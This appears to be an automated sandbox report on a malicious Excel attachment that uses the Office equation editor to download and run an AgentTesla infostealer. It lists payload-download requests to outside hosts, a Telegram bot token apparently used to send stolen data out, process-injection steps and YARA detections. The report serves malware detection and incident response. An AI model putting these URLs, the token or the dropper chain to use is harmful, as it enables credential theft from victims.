                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1001850193580392480/1002961152617222144/seven.dll
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pkusukoharjo.com/
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exe
                Source: dbSYXB9S.Pu6cLString found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exej
                Source: EQNEDT32.EXE, 00000002.00000002.996175505.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exejjC:
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pkusukoharjo.com/y
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84E7CB3E.pngJump to behavior
                Source: unknownDNS traffic detected: queries for: pkusukoharjo.com
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8B6F LoadLibraryW,URLDownloadToFileW,2_2_038A8B6F
                Source: global trafficHTTP traffic detected: GET /giving/qGTGx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pkusukoharjo.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /attachments/1001850193580392480/1002961152617222144/seven.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /htdocs/zTALg.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 136.243.86.20:443 -> 192.168.2.22:49171 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.22:49172 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exeJump to dropped file
                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeCode function: 5_2_001A35405_2_001A3540
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeCode function: 5_2_007921E25_2_007921E2
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
                Source: Contract - Wipak Oy.xlsxVirustotal: Detection: 53%
                Source: Contract - Wipak Oy.xlsxReversingLabs: Detection: 41%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeCode function: 6_2_001BAAB6 AdjustTokenPrivileges,6_2_001BAAB6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeCode function: 6_2_001BAA7F AdjustTokenPrivileges,6_2_001BAA7F
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Contract - Wipak Oy.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA67B.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/6@2/3
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: Contract - Wipak Oy.xlsxOLE indicator, Workbook stream: true
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                Source: Contract - Wipak Oy.xlsxInitial sample: OLE zip file path = xl/media/image1.png
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Contract - Wipak Oy.xlsxStatic file information: File size 2819080 > 1048576
                Source: Binary string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\powershell_ise.pdbw source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powershell_ise.pdbD source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 9C:\Win.pdbSys source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: .pdbN source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: indows\symbols\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Administrator\AppData\Local\Temp\2\System.Activities.pdb source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996241614.000000000060A000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000000.992431011.0000000000FF2000.00000020.00000001.01000000.00000005.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, qGTGx[1].exe.2.dr
                Source: Binary string: T3npC:\Windows\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000002.1027747753.000000000478D000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: indows\powershell_ise.pdbpdbise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Contract - Wipak Oy.xlsxInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: qGTGx[1].exe.2.dr, Activities/Form1.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, Activities/Form1.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 5.0.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.ff0000.0.unpack, Activities/Form1.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
